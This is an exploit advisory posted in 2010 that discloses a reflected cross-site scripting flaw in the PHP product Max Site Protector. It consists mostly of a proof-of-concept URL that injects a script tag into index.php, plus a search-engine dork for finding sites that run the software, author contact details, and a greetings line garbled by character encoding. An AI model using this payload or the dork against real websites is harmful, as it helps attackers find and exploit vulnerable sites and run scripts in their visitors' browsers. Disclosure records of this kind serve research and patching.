maxsiteprotector-xss.txt
Posted on 18 January 2010
======================================================================================== | # Title : Max Site Protector Cross Site Scripting Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860) | # Web Site : www.iq-ty.com | # Dork : Powered by PHP F1 (max Site Protector) | # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu) | # Bug : XSS ====================== Exploit By indoushka ================================= # Exploit : 1- http://127.0.0.1:80/maxSiteProtector/index.php/>"><ScRiPt>alert(407466671644)</ScRiPt> ================================ Dz-Ghost Team ======================================== Greetz : ÓíÏí ÈáÚÈÇÓ + Úíä ÇáÈÑÏ + ÔáÛæã ÇáÚíÏ K10 + K@MEL + Úíä ãáíáÉ + ÊÛäíÝ -------------------------------------------------------------------------------------------
